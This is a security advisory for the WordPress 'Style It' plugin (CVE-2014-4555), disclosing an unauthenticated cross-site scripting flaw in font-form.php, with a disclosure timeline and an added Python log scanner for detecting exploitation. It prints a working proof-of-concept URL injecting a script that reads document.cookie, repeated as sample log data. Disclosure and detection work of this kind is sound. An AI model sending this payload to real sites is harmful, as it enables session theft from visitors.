wp-plugin : style-it

Plugin Details
Plugin Name: wp-plugin : style-it
Affected Version : 1 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://localhost/wordpress/wp-content/wp-plugs/styleit/fonts/font-form.php?mode=mode%22%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
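
As an added defensive example (not part of the original advisory or the plugin's code), the Python code below scans web-server access logs for requests to the affected `font-form.php` whose `mode` parameter, after repeated percent-decoding, falls outside an allow-list. The allow-list pattern, the function names and the sample log lines are assumptions constructed for illustration; only the path suffix and the second sample query come from the PoC above.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

TARGET = "/styleit/fonts/font-form.php"          # path suffix from the PoC URL
SAFE_MODE = re.compile(r"[A-Za-z0-9_-]{1,32}")   # assumption: shape of legitimate values
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format), not real traffic.
_PREFIX = '203.0.113.7 - - [25/May/2014:10:00:00 +0000] "GET /wordpress'
_FORM = _PREFIX + "/wp-content/wp-plugs/styleit/fonts/font-form.php?mode="
SAMPLE_LOG = [
    _FORM + 'google HTTP/1.1" 200 512',             # benign (hypothetical value)
    _FORM + 'mode%22%3C/script%3E%3Cscript%3Ealert%28document.cookie%29'
            '%3C/script%3E& HTTP/1.1" 200 640',     # query string from the PoC
    _FORM + 'x%253Cb%253E HTTP/1.1" 200 640',       # double-encoded markup
    _PREFIX + '/index.php?mode=%3Cb%3E HTTP/1.1" 200 100',  # other script: ignored
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_mode(line):
    """Return the decoded `mode` value if the line is a request to the plugin's
    font-form.php with a `mode` outside the allow-list, otherwise None."""
    match = REQUEST.search(line)
    if not match:
        return None
    url = urlsplit(match.group(1))
    if not unquote(url.path).endswith(TARGET):
        return None
    for raw in parse_qs(url.query).get("mode", []):  # parse_qs decodes once
        value = fully_decode(raw)
        if not SAFE_MODE.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = ((n, suspicious_mode(line)) for n, line in enumerate(lines, 1))
    return [(n, value) for n, value in hits if value is not None]

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: suspicious mode={value!r}")
```

Tighten `SAFE_MODE` to the exact set of values the installed plugin version accepts once those are known; the pattern here is deliberately generic.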


Disclosure Timeline
Vendor Contacted : 2014-01-22
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4555
Plugin Description :
This plugin enables you to manage background and fonts of almost every item in your WordPress blog. This plugin by default supports google fonts and cufon js fonts. Style It also features a powerful editor where you can change various settings like background-image, background-url, color, etc. This plugin is very easy to optimize for any blog. [Style It Homepage](http://www.unizoe.com/products/style-it-wp/ "Plugin homepage")